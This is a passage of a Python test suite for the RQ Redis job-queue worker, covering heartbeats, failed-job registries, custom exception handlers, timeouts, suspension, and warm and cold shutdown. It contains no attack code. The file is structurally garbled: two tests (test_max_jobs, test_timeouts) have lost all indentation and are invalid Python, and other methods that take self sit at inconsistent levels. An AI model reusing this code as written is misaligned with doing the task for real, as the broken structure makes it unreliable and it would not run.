        w = Worker.find_by_key(w.key)
        self.assertIsInstance(w.last_heartbeat, datetime)
        # worker.refresh() shouldn't fail if last_heartbeat is None
        # for compatibility reasons
        self.testconn.hdel(w.key, 'last_heartbeat')
        w.refresh()
        # worker.refresh() shouldn't fail if birth is None
        # for compatibility reasons
        self.testconn.hdel(w.key, 'birth')
        w.refresh()
    @slow
    def test_heartbeat_busy(self):
        """Periodic heartbeats while horse is busy with long jobs"""
        q = Queue()
        w = Worker([q], job_monitoring_interval=5)
        # With a 5s monitoring interval, a 2s job triggers no extra heartbeat,
        # a 7s job one, and a 12s job two.
        for timeout, expected_heartbeats in [(2, 0), (7, 1), (12, 2)]:
            job = q.enqueue(long_running_job,
                            args=(timeout,),
                            job_timeout=30,
                            result_ttl=-1)
            with mock.patch.object(w, 'heartbeat', wraps=w.heartbeat) as mocked:
                w.execute_job(job, q)
                self.assertEqual(mocked.call_count, expected_heartbeats)
            job = Job.fetch(job.id)
            self.assertEqual(job.get_status(), JobStatus.FINISHED)
    def test_work_fails(self):
        """Failing jobs are put on the failed queue."""
        q = Queue()
        self.assertEqual(q.count, 0)
        # Action
        job = q.enqueue(div_by_zero)
        self.assertEqual(q.count, 1)
        # keep for later
        enqueued_at_date = str(job.enqueued_at)
        w = Worker([q])
        w.work(burst=True)  # should silently pass
        # Postconditions
        self.assertEqual(q.count, 0)
        failed_job_registry = FailedJobRegistry(queue=q)
        self.assertTrue(job in failed_job_registry)
        # The worker must not be left pointing at the failed job.
        self.assertEqual(w.get_current_job_id(), None)
        # Check the job
        job = Job.fetch(job.id)
        self.assertEqual(job.origin, q.name)
        # Should be the original enqueued_at date, not the date of enqueueing
        # to the failed queue
        self.assertEqual(str(job.enqueued_at), enqueued_at_date)
        self.assertTrue(job.exc_info)  # should contain exc_info
    def test_statistics(self):
        """Successful and failed job counts are saved properly"""
        queue = Queue()
        job = queue.enqueue(div_by_zero)
        worker = Worker([queue])
        worker.register_birth()
        self.assertEqual(worker.failed_job_count, 0)
        self.assertEqual(worker.successful_job_count, 0)
        self.assertEqual(worker.total_working_time, 0)
        registry = StartedJobRegistry(connection=worker.connection)
        # Give the job a fixed 0.75s duration so working time is predictable.
        job.started_at = utcnow()
        job.ended_at = job.started_at + timedelta(seconds=0.75)
        worker.handle_job_failure(job)
        worker.handle_job_success(job, queue, registry)
        worker.refresh()
        self.assertEqual(worker.failed_job_count, 1)
        self.assertEqual(worker.successful_job_count, 1)
        self.assertEqual(worker.total_working_time, 1.5)  # 1.5 seconds
        worker.handle_job_failure(job)
        worker.handle_job_success(job, queue, registry)
        worker.refresh()
        self.assertEqual(worker.failed_job_count, 2)
        self.assertEqual(worker.successful_job_count, 2)
        self.assertEqual(worker.total_working_time, 3.0)
    def test_total_working_time(self):
        """worker.total_working_time is stored properly"""
        queue = Queue()
        job = queue.enqueue(long_running_job, 0.05)
        worker = Worker([queue])
        worker.register_birth()
        worker.perform_job(job, queue)
        worker.refresh()
        # total_working_time should be a little bit more than 0.05 seconds
        self.assertGreaterEqual(worker.total_working_time, 0.05)
        # in multi-user environments delays might be unpredictable,
        # please adjust this magic limit accordingly in case if It takes even longer to run
        self.assertLess(worker.total_working_time, 1)
def test_max_jobs(self):
"""Worker exits after number of jobs complete."""
queue = Queue()
job1 = queue.enqueue(do_nothing)
job2 = queue.enqueue(do_nothing)
worker = Worker([queue])
worker.work(max_jobs=1)
self.assertEqual(JobStatus.FINISHED, job1.get_status())
self.assertEqual(JobStatus.QUEUED, job2.get_status())
    def test_disable_default_exception_handler(self):
        """
        Failed jobs are moved to FailedJobRegistry when the default exception
        handler is enabled (disable_default_exception_handler=False), and are
        NOT moved when it is disabled (True).
        """
        queue = Queue(name='default', connection=self.testconn)
        job = queue.enqueue(div_by_zero)
        # Handler enabled: the failed job lands in the registry.
        worker = Worker([queue], disable_default_exception_handler=False)
        worker.work(burst=True)
        registry = FailedJobRegistry(queue=queue)
        self.assertTrue(job in registry)
        # Job is not added to FailedJobRegistry if
        # disable_default_exception_handler is True
        job = queue.enqueue(div_by_zero)
        worker = Worker([queue], disable_default_exception_handler=True)
        worker.work(burst=True)
        self.assertFalse(job in registry)
    def test_custom_exc_handling(self):
        """Custom exception handling."""
        # Returning True (or None) lets the next handler in the chain run.
        def first_handler(job, *exc_info):
            job.meta = {'first_handler': True}
            job.save_meta()
            return True

        def second_handler(job, *exc_info):
            job.meta.update({'second_handler': True})
            job.save_meta()

        # Returning False stops the chain (including the default handler).
        def black_hole(job, *exc_info):
            # Don't fall through to default behaviour (moving to failed queue)
            return False

        q = Queue()
        self.assertEqual(q.count, 0)
        job = q.enqueue(div_by_zero)
        w = Worker([q], exception_handlers=first_handler)
        w.work(burst=True)
        # Check the job
        job.refresh()
        self.assertEqual(job.is_failed, True)
        self.assertTrue(job.meta['first_handler'])
        job = q.enqueue(div_by_zero)
        w = Worker([q], exception_handlers=[first_handler, second_handler])
        w.work(burst=True)
        # Both custom exception handlers are run
        job.refresh()
        self.assertEqual(job.is_failed, True)
        self.assertTrue(job.meta['first_handler'])
        self.assertTrue(job.meta['second_handler'])
        job = q.enqueue(div_by_zero)
        w = Worker([q], exception_handlers=[first_handler, black_hole,
                                            second_handler])
        w.work(burst=True)
        # second_handler is not run since it's interrupted by black_hole
        job.refresh()
        self.assertEqual(job.is_failed, True)
        self.assertTrue(job.meta['first_handler'])
        self.assertEqual(job.meta.get('second_handler'), None)
    def test_cancelled_jobs_arent_executed(self):
        """Cancelling jobs."""
        SENTINEL_FILE = '/tmp/rq-tests.txt'  # noqa
        try:
            # Remove the sentinel if it is leftover from a previous test run
            os.remove(SENTINEL_FILE)
        except OSError as e:
            # errno 2 == ENOENT (file already absent); anything else re-raises.
            if e.errno != 2:
                raise
        q = Queue()
        job = q.enqueue(create_file, SENTINEL_FILE)
        # Here, we cancel the job, so the sentinel file may not be created
        self.testconn.delete(job.key)
        w = Worker([q])
        w.work(burst=True)
        assert q.count == 0
        # Should not have created evidence of execution
        self.assertEqual(os.path.exists(SENTINEL_FILE), False)
@slow # noqa
def test_timeouts(self):
"""Worker kills jobs after timeout."""
sentinel_file = '/tmp/.rq_sentinel'
q = Queue()
w = Worker([q])
# Put it on the queue with a timeout value
res = q.enqueue(create_file_after_timeout,
args=(sentinel_file, 4),
job_timeout=1)
try:
os.unlink(sentinel_file)
except OSError as e:
if e.errno == 2:
pass
self.assertEqual(os.path.exists(sentinel_file), False)
w.work(burst=True)
self.assertEqual(os.path.exists(sentinel_file), False)
# TODO: Having to do the manual refresh() here is really ugly!
res.refresh()
self.assertIn('JobTimeoutException', as_text(res.exc_info))
    def test_worker_sets_result_ttl(self):
        """Ensure that Worker properly sets result_ttl for individual jobs."""
        q = Queue()
        # Positive result_ttl: the job key gets a finite expiry after work.
        job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
        w = Worker([q])
        self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
        w.work(burst=True)
        self.assertNotEqual(self.testconn.ttl(job.key), 0)
        self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
        # Job with -1 result_ttl don't expire
        job = q.enqueue(say_hello, args=('Frank',), result_ttl=-1)
        w = Worker([q])
        self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
        w.work(burst=True)
        self.assertEqual(self.testconn.ttl(job.key), -1)
        self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
        # Job with result_ttl = 0 gets deleted immediately
        job = q.enqueue(say_hello, args=('Frank',), result_ttl=0)
        w = Worker([q])
        self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
        w.work(burst=True)
        self.assertEqual(self.testconn.get(job.key), None)
        self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
    def test_worker_sets_job_status(self):
        """Ensure that worker correctly sets job status."""
        q = Queue()
        w = Worker([q])
        job = q.enqueue(say_hello)
        # Before work: queued.
        self.assertEqual(job.get_status(), JobStatus.QUEUED)
        self.assertEqual(job.is_queued, True)
        self.assertEqual(job.is_finished, False)
        self.assertEqual(job.is_failed, False)
        w.work(burst=True)
        # After successful work: finished.
        job = Job.fetch(job.id)
        self.assertEqual(job.get_status(), JobStatus.FINISHED)
        self.assertEqual(job.is_queued, False)
        self.assertEqual(job.is_finished, True)
        self.assertEqual(job.is_failed, False)
        # Failed jobs should set status to "failed"
        job = q.enqueue(div_by_zero, args=(1,))
        w.work(burst=True)
        job = Job.fetch(job.id)
        self.assertEqual(job.get_status(), JobStatus.FAILED)
        self.assertEqual(job.is_queued, False)
        self.assertEqual(job.is_finished, False)
        self.assertEqual(job.is_failed, True)
    def test_job_dependency(self):
        """Enqueue dependent jobs only if their parents don't fail"""
        q = Queue()
        w = Worker([q])
        # Successful parent: dependent job runs and finishes.
        parent_job = q.enqueue(say_hello, result_ttl=0)
        job = q.enqueue_call(say_hello, depends_on=parent_job)
        w.work(burst=True)
        job = Job.fetch(job.id)
        self.assertEqual(job.get_status(), JobStatus.FINISHED)
        # Failing parent: dependent job must not reach FINISHED.
        parent_job = q.enqueue(div_by_zero)
        job = q.enqueue_call(say_hello, depends_on=parent_job)
        w.work(burst=True)
        job = Job.fetch(job.id)
        self.assertNotEqual(job.get_status(), JobStatus.FINISHED)
    def test_get_current_job(self):
        """Ensure worker.get_current_job() works properly"""
        q = Queue()
        worker = Worker([q])
        job = q.enqueue_call(say_hello)
        # No job assigned yet: the hash field is absent.
        self.assertEqual(self.testconn.hget(worker.key, 'current_job'), None)
        worker.set_current_job_id(job.id)
        # Setting the id persists it to Redis and round-trips through the API.
        self.assertEqual(
            worker.get_current_job_id(),
            as_text(self.testconn.hget(worker.key, 'current_job'))
        )
        self.assertEqual(worker.get_current_job(), job)
def test_custom_job_class(self):
"""Ensure Worker accepts custom job class."""
q = Queue()
worker = Worker([q], job_class=CustomJob)
self.assertEqual(worker.job_class, CustomJob)
def test_custom_queue_class(self):
"""Ensure Worker accepts custom queue class."""
q = CustomQueue()
worker = Worker([q], queue_class=CustomQueue)
self.assertEqual(worker.queue_class, CustomQueue)
    def test_custom_queue_class_is_not_global(self):
        """Ensure Worker custom queue class is not global."""
        q = CustomQueue()
        worker_custom = Worker([q], queue_class=CustomQueue)
        q_generic = Queue()
        worker_generic = Worker([q_generic])
        # Only the instance that asked for CustomQueue gets it; other
        # instances and the class default stay untouched.
        self.assertEqual(worker_custom.queue_class, CustomQueue)
        self.assertEqual(worker_generic.queue_class, Queue)
        self.assertEqual(Worker.queue_class, Queue)
def test_custom_job_class_is_not_global(self):
    """Ensure Worker custom job class is not global."""
    custom_worker = Worker([Queue()], job_class=CustomJob)
    generic_worker = Worker([Queue()])

    # job_class affects only the instance it was passed to...
    self.assertEqual(custom_worker.job_class, CustomJob)
    self.assertEqual(generic_worker.job_class, Job)
    # ...and never the class-level default.
    self.assertEqual(Worker.job_class, Job)
def test_work_via_simpleworker(self):
    """Worker processes work, with forking disabled,
    then returns."""
    foo_queue, bar_queue = Queue('foo'), Queue('bar')
    worker = SimpleWorker([foo_queue, bar_queue])
    self.assertEqual(worker.work(burst=True), False,
                     'Did not expect any work on the queue.')

    job = foo_queue.enqueue(say_pid)
    self.assertEqual(worker.work(burst=True), True,
                     'Expected at least some work done.')
    # SimpleWorker runs the job in-process, so it must see our own PID.
    self.assertEqual(job.result, os.getpid(),
                     'PID mismatch, fork() is not supposed to happen here')
def test_simpleworker_heartbeat_ttl(self):
    """SimpleWorker's key must last longer than job.timeout when working"""
    queue = Queue('foo')
    worker = SimpleWorker([queue])
    timeout = 300
    # The fixture stores the worker key's TTL into job.meta['ttl'].
    job = queue.enqueue(save_key_ttl, worker.key, job_timeout=timeout)
    worker.work(burst=True)
    job.refresh()
    self.assertGreater(job.meta['ttl'], timeout)
def test_prepare_job_execution(self):
    """Prepare job execution does the necessary bookkeeping."""
    queue = Queue(connection=self.testconn)
    job = queue.enqueue(say_hello)
    worker = Worker([queue])

    worker.prepare_job_execution(job)

    # The job lands in the started-job registry...
    registry = StartedJobRegistry(connection=self.testconn)
    self.assertEqual(registry.get_job_ids(), [job.id])
    # ...and the worker records what it is busy with.
    self.assertEqual(worker.get_state(), 'busy')
    self.assertEqual(worker.get_current_job_id(), job.id)
def test_prepare_job_execution_inf_timeout(self):
    """Prepare job execution handles infinite job timeout"""
    queue = Queue(connection=self.testconn)
    job = queue.enqueue(long_running_job, args=(1,), job_timeout=-1)
    worker = Worker([queue])

    worker.prepare_job_execution(job)

    registry = StartedJobRegistry(connection=self.testconn)
    self.assertEqual(registry.get_job_ids(), [job.id])
    # job_timeout=-1 must be stored as an infinite expiry score.
    self.assertEqual(self.testconn.zscore(registry.key, job.id), float('Inf'))
def test_work_unicode_friendly(self):
    """Worker processes work with unicode description, then quits."""
    queue = Queue('foo')
    worker = Worker([queue])
    job = queue.enqueue('tests.fixtures.say_hello', name='Adam',
                        description='你好 世界!')
    self.assertEqual(worker.work(burst=True), True,
                     'Expected at least some work done.')
    # Result and the non-ASCII description both survive the round trip.
    self.assertEqual(job.result, 'Hi there, Adam!')
    self.assertEqual(job.description, '你好 世界!')
def test_work_log_unicode_friendly(self):
    """Worker process work with unicode or str other than pure ascii content,
    logging work properly"""
    queue = Queue("foo")
    worker = Worker([queue])

    # Both a plain fixture and a unicode-returning fixture must log
    # cleanly with non-ASCII job names/descriptions.
    for func_name in ('tests.fixtures.say_hello',
                      'tests.fixtures.say_hello_unicode'):
        job = queue.enqueue(func_name, name='阿达姆',
                            description='你好 世界!')
        worker.work(burst=True)
        self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_suspend_worker_execution(self):
    """A suspended worker must not pick up jobs until resumed.

    Fixes: replaces the magic errno value ``2`` with ``errno.ENOENT``
    and the bare ``assert`` statements (which vanish under ``python -O``
    and give no failure message) with unittest assertions, matching the
    rest of this file.
    """
    import errno

    SENTINEL_FILE = '/tmp/rq-tests.txt'  # noqa
    try:
        # Remove the sentinel if it is leftover from a previous test run
        os.remove(SENTINEL_FILE)
    except OSError as e:
        # Only "file does not exist" is acceptable here.
        if e.errno != errno.ENOENT:
            raise

    q = Queue()
    q.enqueue(create_file, SENTINEL_FILE)
    w = Worker([q])

    suspend(self.testconn)
    w.work(burst=True)
    # Suspended: the job stays queued and leaves no evidence of execution.
    self.assertEqual(q.count, 1)
    self.assertEqual(os.path.exists(SENTINEL_FILE), False)

    resume(self.testconn)
    w.work(burst=True)
    # Resumed: the job ran and created the sentinel.
    self.assertEqual(q.count, 0)
    self.assertEqual(os.path.exists(SENTINEL_FILE), True)
@slow
def test_suspend_with_duration(self):
    """A timed suspension expires on its own and work then resumes.

    Fixes: bare ``assert`` statements (stripped under ``python -O``,
    no failure message) replaced with ``self.assertEqual`` for
    consistency with the rest of this file.
    """
    q = Queue()
    for _ in range(5):
        q.enqueue(do_nothing)
    w = Worker([q])

    # This suspends workers for working for 2 second
    suspend(self.testconn, 2)

    # So when this burst of work happens the queue should remain at 5
    w.work(burst=True)
    self.assertEqual(q.count, 5)

    sleep(3)

    # The suspension should be expired now, and a burst of work should now clear the queue
    w.work(burst=True)
    self.assertEqual(q.count, 0)
def test_worker_hash_(self):
    """Workers are hashed by their .name attribute"""
    queue = Queue('foo')
    first = Worker([queue], name="worker1")
    second = Worker([queue], name="worker2")
    duplicate = Worker([queue], name="worker1")
    # Two distinct names -> a set of three workers collapses to two.
    self.assertEqual(len({first, second, duplicate}), 2)
def test_worker_sets_birth(self):
    """Ensure worker correctly sets worker birth date.

    Fixes: asserts the type with ``assertIsInstance`` (clearer failure
    message, consistent with test_worker_sets_death) instead of
    comparing ``type(x).__name__`` to a string.
    """
    q = Queue()
    w = Worker([q])

    w.register_birth()
    birth_date = w.birth_date
    self.assertIsNotNone(birth_date)
    self.assertIsInstance(birth_date, datetime)
def test_worker_sets_death(self):
    """Ensure worker correctly sets worker death date."""
    worker = Worker([Queue()])
    worker.register_death()
    recorded = worker.death_date
    # A real datetime must have been persisted.
    self.assertIsNotNone(recorded)
    self.assertIsInstance(recorded, datetime)
def test_clean_queue_registries(self):
    """worker.clean_registries sets last_cleaned_at and cleans registries."""
    queues = {}
    registries = {}
    # Seed a stale entry into each queue's started-job registry.
    for name in ('foo', 'bar'):
        queues[name] = Queue(name, connection=self.testconn)
        registries[name] = StartedJobRegistry(name, connection=self.testconn)
        self.testconn.zadd(registries[name].key, {name: 1})
        self.assertEqual(self.testconn.zcard(registries[name].key), 1)

    worker = Worker([queues['foo'], queues['bar']])
    self.assertEqual(worker.last_cleaned_at, None)

    worker.clean_registries()

    self.assertNotEqual(worker.last_cleaned_at, None)
    self.assertEqual(self.testconn.zcard(registries['foo'].key), 0)
    self.assertEqual(self.testconn.zcard(registries['bar'].key), 0)

    # worker.clean_registries() only runs once every 15 minutes
    # If we add another key, calling clean_registries() should do nothing
    self.testconn.zadd(registries['bar'].key, {'bar': 1})
    worker.clean_registries()
    self.assertEqual(self.testconn.zcard(registries['bar'].key), 1)
def test_should_run_maintenance_tasks(self):
    """Workers should run maintenance tasks on startup and every hour."""
    queue = Queue(connection=self.testconn)
    worker = Worker(queue)

    # Fresh worker: never cleaned, so maintenance is due.
    self.assertTrue(worker.should_run_maintenance_tasks)

    # Cleaned just now: not due again yet.
    worker.last_cleaned_at = utcnow()
    self.assertFalse(worker.should_run_maintenance_tasks)

    # Cleaned more than an hour ago: due again.
    worker.last_cleaned_at = utcnow() - timedelta(seconds=3700)
    self.assertTrue(worker.should_run_maintenance_tasks)
def test_worker_calls_clean_registries(self):
    """Worker calls clean_registries when run."""
    queue = Queue(connection=self.testconn)
    registry = StartedJobRegistry(connection=self.testconn)
    # Plant a stale registry entry for the worker to sweep.
    self.testconn.zadd(registry.key, {'foo': 1})

    Worker(queue, connection=self.testconn).work(burst=True)

    self.assertEqual(self.testconn.zcard(registry.key), 0)
def test_job_dependency_race_condition(self):
    """Dependencies added while the job gets finished shouldn't get lost.

    Fixes: the original monkey-patched ``Queue.enqueue_dependents`` and
    set ``Queue._add_enqueue`` without ever restoring them, leaking the
    patch into every subsequently-run test; restoration is now
    registered via ``addCleanup`` so it happens even on failure.
    """
    # This patches the enqueue_dependents to enqueue a new dependency AFTER
    # the original code was executed.
    orig_enqueue_dependents = Queue.enqueue_dependents

    def new_enqueue_dependents(self, job, *args, **kwargs):
        orig_enqueue_dependents(self, job, *args, **kwargs)
        if hasattr(Queue, '_add_enqueue') and Queue._add_enqueue is not None and Queue._add_enqueue.id == job.id:
            Queue._add_enqueue = None
            Queue().enqueue_call(say_hello, depends_on=job)

    def restore_queue_class():
        # Undo the monkey-patch so other tests see the pristine class.
        Queue.enqueue_dependents = orig_enqueue_dependents
        if hasattr(Queue, '_add_enqueue'):
            del Queue._add_enqueue

    Queue.enqueue_dependents = new_enqueue_dependents
    self.addCleanup(restore_queue_class)

    q = Queue()
    w = Worker([q])
    with mock.patch.object(Worker, 'execute_job', wraps=w.execute_job) as mocked:
        parent_job = q.enqueue(say_hello, result_ttl=0)
        Queue._add_enqueue = parent_job
        job = q.enqueue_call(say_hello, depends_on=parent_job)
        w.work(burst=True)
        job = Job.fetch(job.id)
        self.assertEqual(job.get_status(), JobStatus.FINISHED)

        # The created spy checks two issues:
        # * before the fix of #739, 2 of the 3 jobs where executed due
        #   to the race condition
        # * during the development another issue was fixed:
        #   due to a missing pipeline usage in Queue.enqueue_job, the job
        #   which was enqueued before the "rollback" was executed twice.
        #   So before that fix the call count was 4 instead of 3
        self.assertEqual(mocked.call_count, 3)
def test_self_modification_persistence(self):
    """Make sure that any meta modification done by
    the job itself persists completely through the
    queue/worker/job stack."""
    queue = Queue()
    # Seed pre-existing metadata; the fixture overwrites 'baz' and adds
    # 'newinfo' while the job runs.
    job = queue.enqueue(modify_self, meta={'foo': 'bar', 'baz': 42},
                        args=[{'baz': 10, 'newinfo': 'waka'}])
    Worker([queue]).work(burst=True)

    reloaded = Job.fetch(job.id)
    self.assertEqual(reloaded.meta['foo'], 'bar')
    self.assertEqual(reloaded.meta['baz'], 10)
    self.assertEqual(reloaded.meta['newinfo'], 'waka')
def test_self_modification_persistence_with_error(self):
    """Make sure that any meta modification done by
    the job itself persists completely through the
    queue/worker/job stack -- even if the job errored"""
    queue = Queue()
    # Seed pre-existing metadata; the fixture mutates it, then raises.
    job = queue.enqueue(modify_self_and_error, meta={'foo': 'bar', 'baz': 42},
                        args=[{'baz': 10, 'newinfo': 'waka'}])
    worker = Worker([queue])
    worker.work(burst=True)

    # Postconditions: queue drained, job registered as failed, worker idle.
    self.assertEqual(queue.count, 0)
    self.assertTrue(job in FailedJobRegistry(queue=queue))
    self.assertEqual(worker.get_current_job_id(), None)

    reloaded = Job.fetch(job.id)
    self.assertEqual(reloaded.meta['foo'], 'bar')
    self.assertEqual(reloaded.meta['baz'], 10)
    self.assertEqual(reloaded.meta['newinfo'], 'waka')
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_true(self, mock_logger_info):
    """Check that log_result_lifespan True causes job lifespan to be logged."""
    queue = Queue()
    worker = Worker([queue])
    job = queue.enqueue(say_hello, args=('Frank',), result_ttl=10)

    worker.perform_job(job, queue)

    mock_logger_info.assert_called_with('Result is kept for %s seconds', 10)
    logged_messages = [call[0][0] for call in mock_logger_info.call_args_list]
    self.assertIn('Result is kept for %s seconds', logged_messages)
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_false(self, mock_logger_info):
    """Check that log_result_lifespan False causes job lifespan to not be logged."""
    queue = Queue()

    class QuietWorker(Worker):
        # Subclass that opts out of result-lifespan logging.
        log_result_lifespan = False

    worker = QuietWorker([queue])
    job = queue.enqueue(say_hello, args=('Frank',), result_ttl=10)

    worker.perform_job(job, queue)

    logged_messages = [call[0][0] for call in mock_logger_info.call_args_list]
    self.assertNotIn('Result is kept for 10 seconds', logged_messages)
@mock.patch('rq.worker.logger.info')
def test_log_job_description_true(self, mock_logger_info):
    """Check that log_job_description True causes job lifespan to be logged."""
    queue = Queue()
    worker = Worker([queue])
    queue.enqueue(say_hello, args=('Frank',), result_ttl=10)

    worker.dequeue_job_and_maintain_ttl(10)

    # The job description (which embeds the call args) is the third
    # positional argument of the log call.
    self.assertIn("Frank", mock_logger_info.call_args[0][2])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_false(self, mock_logger_info):
    """Check that log_job_description False causes job lifespan to not be logged."""
    queue = Queue()
    worker = Worker([queue], log_job_description=False)
    queue.enqueue(say_hello, args=('Frank',), result_ttl=10)

    worker.dequeue_job_and_maintain_ttl(10)

    # With description logging off, the args must not appear in the log call.
    self.assertNotIn("Frank", mock_logger_info.call_args[0][2])
def test_worker_version(self):
    """Worker.version survives registration, refresh and key lookup."""
    worker = Worker([Queue()])
    worker.version = '0.0.0'
    worker.register_birth()
    self.assertEqual(worker.version, '0.0.0')

    worker.refresh()
    self.assertEqual(worker.version, '0.0.0')

    # making sure that version is preserved when worker is retrieved by key
    fetched = Worker.find_by_key(worker.key)
    self.assertEqual(fetched.version, '0.0.0')
def test_python_version(self):
    """Worker.python_version defaults to sys.version and may be overridden."""
    queue = Queue()

    default_worker = Worker([queue])
    default_worker.register_birth()
    self.assertEqual(default_worker.python_version, sys.version)

    # now patching version
    fake_version = 'X.Y.Z.final'  # dummy version
    self.assertNotEqual(fake_version, sys.version)  # otherwise tests are pointless

    patched_worker = Worker([queue])
    patched_worker.python_version = fake_version
    patched_worker.register_birth()
    self.assertEqual(patched_worker.python_version, fake_version)

    # making sure that version is preserved when worker is retrieved by key
    fetched = Worker.find_by_key(patched_worker.key)
    self.assertEqual(fetched.python_version, fake_version)
def wait_and_kill_work_horse(pid, time_to_wait=0.0):
    """Sleep for `time_to_wait` seconds, then SIGKILL process `pid`.

    Run in a helper Process to kill a worker's work horse mid-job.
    """
    time.sleep(time_to_wait)
    os.kill(pid, signal.SIGKILL)
class TimeoutTestCase:
    """Mixin that fails a test with AssertionError if it runs too long.

    Used by the shutdown tests below: if signals are ignored and the
    worker keeps running, SIGALRM fires after ``killtimeout`` seconds
    and aborts the test instead of hanging the whole suite.

    Fixes: the ``_timeout`` handler's first parameter was named
    ``signal``, shadowing the ``signal`` module inside the method; it is
    renamed to the conventional ``signum`` (handlers are invoked
    positionally, so callers are unaffected).
    """

    def setUp(self):
        # we want tests to fail if signal are ignored and the work remain
        # running, so set a signal to kill them after X seconds
        self.killtimeout = 15
        signal.signal(signal.SIGALRM, self._timeout)
        signal.alarm(self.killtimeout)

    def _timeout(self, signum, frame):
        raise AssertionError(
            "test still running after %i seconds, likely the worker wasn't shutdown correctly" % self.killtimeout
        )
class WorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
    # Warm/cold shutdown and work-horse-death tests.  Each test forks a
    # helper Process that sends SIGTERM back to this (worker) process
    # while it is blocked inside work().

    @slow
    def test_idle_worker_warm_shutdown(self):
        """worker with no ongoing job receiving single SIGTERM signal and shutting down"""
        w = Worker('foo')
        self.assertFalse(w._stop_requested)
        # Helper sends one SIGTERM to us (False => no second signal).
        p = Process(target=kill_worker, args=(os.getpid(), False))
        p.start()

        w.work()

        p.join(1)
        # An idle worker exits its loop without ever flagging a stop request.
        self.assertFalse(w._stop_requested)

    @slow
    def test_working_worker_warm_shutdown(self):
        """worker with an ongoing job receiving single SIGTERM signal, allowing job to finish then shutting down"""
        fooq = Queue('foo')
        w = Worker(fooq)

        # Job takes ~2s; the SIGTERM arrives while it is still running.
        sentinel_file = '/tmp/.rq_sentinel_warm'
        fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
        self.assertFalse(w._stop_requested)
        p = Process(target=kill_worker, args=(os.getpid(), False))
        p.start()

        w.work()

        p.join(2)
        self.assertFalse(p.is_alive())
        # Warm shutdown: stop was requested, yet the job ran to completion
        # (the sentinel file exists).
        self.assertTrue(w._stop_requested)
        self.assertTrue(os.path.exists(sentinel_file))

        self.assertIsNotNone(w.shutdown_requested_date)
        self.assertEqual(type(w.shutdown_requested_date).__name__, 'datetime')

    @slow
    def test_working_worker_cold_shutdown(self):
        """Busy worker shuts down immediately on double SIGTERM signal"""
        fooq = Queue('foo')
        w = Worker(fooq)
        sentinel_file = '/tmp/.rq_sentinel_cold'
        fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
        self.assertFalse(w._stop_requested)
        # True => helper sends SIGTERM twice, forcing a cold shutdown,
        # which raises SystemExit out of work().
        p = Process(target=kill_worker, args=(os.getpid(), True))
        p.start()

        self.assertRaises(SystemExit, w.work)

        p.join(1)
        self.assertTrue(w._stop_requested)
        # The job was killed before it could create its sentinel file.
        self.assertFalse(os.path.exists(sentinel_file))

        shutdown_requested_date = w.shutdown_requested_date
        self.assertIsNotNone(shutdown_requested_date)
        self.assertEqual(type(shutdown_requested_date).__name__, 'datetime')

    @slow
    def test_work_horse_death_sets_job_failed(self):
        """worker with an ongoing job whose work horse dies unexpectedly (before
        completing the job) should set the job's status to FAILED
        """
        fooq = Queue('foo')
        self.assertEqual(fooq.count, 0)
        w = Worker(fooq)
        sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
        if os.path.exists(sentinel_file):
            os.remove(sentinel_file)
        fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
        job, queue = w.dequeue_job_and_maintain_ttl(5)
        w.fork_work_horse(job, queue)
        # SIGKILL the freshly-forked work horse mid-job.
        p = Process(target=wait_and_kill_work_horse, args=(w._horse_pid, 0.5))
        p.start()
        w.monitor_work_horse(job)
        job_status = job.get_status()
        p.join(1)
        self.assertEqual(job_status, JobStatus.FAILED)
        failed_job_registry = FailedJobRegistry(queue=fooq)
        self.assertTrue(job in failed_job_registry)
        self.assertEqual(fooq.count, 0)

    @slow
    def test_work_horse_force_death(self):
        """Simulate a frozen worker that doesn't observe the timeout properly.
        Fake it by artificially setting the timeout of the parent process to
        something much smaller after the process is already forked.
        """
        fooq = Queue('foo')
        self.assertEqual(fooq.count, 0)
        w = Worker(fooq)
        sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
        if os.path.exists(sentinel_file):
            os.remove(sentinel_file)
        fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
        job, queue = w.dequeue_job_and_maintain_ttl(5)
        w.fork_work_horse(job, queue)
        # Shrink the timeout only in the parent, after the fork, so the
        # horse "ignores" it and monitoring must kill it by force.
        job.timeout = 5
        w.job_monitoring_interval = 1
        now = utcnow()
        w.monitor_work_horse(job)
        # Monitoring must give up well before the job's 100s runtime;
        # allow one monitoring interval plus a 65s grace and a fudge factor.
        fudge_factor = 1
        total_time = w.job_monitoring_interval + 65 + fudge_factor
        self.assertTrue((utcnow() - now).total_seconds() < total_time)
        self.assertEqual(job.get_status(), JobStatus.FAILED)
        failed_job_registry = FailedJobRegistry(queue=fooq)
        self.assertTrue(job in failed_job_registry)
        self.assertEqual(fooq.count, 0)
def schedule_access_self():
    """Enqueue the `access_self` fixture on the default queue.

    Used as a job that itself schedules another job.
    """
    default_queue = Queue('default', connection=get_current_connection())
    default_queue.enqueue(access_self)
@pytest.mark.skipif(sys.platform == 'darwin', reason='Fails on OS X')
class TestWorkerSubprocess(RQTestCase):
    """Run the `rqworker` CLI as a real subprocess against the test Redis."""

    def setUp(self):
        super(TestWorkerSubprocess, self).setUp()
        db_num = self.testconn.connection_pool.connection_kwargs['db']
        self.redis_url = 'redis://127.0.0.1:6379/%d' % db_num

    def _run_burst_worker(self):
        # Launch a burst-mode worker subprocess pointed at the test DB;
        # check_call raises if the worker exits non-zero.
        subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])

    def test_run_empty_queue(self):
        """Run the worker in its own process with an empty queue"""
        self._run_burst_worker()

    def test_run_access_self(self):
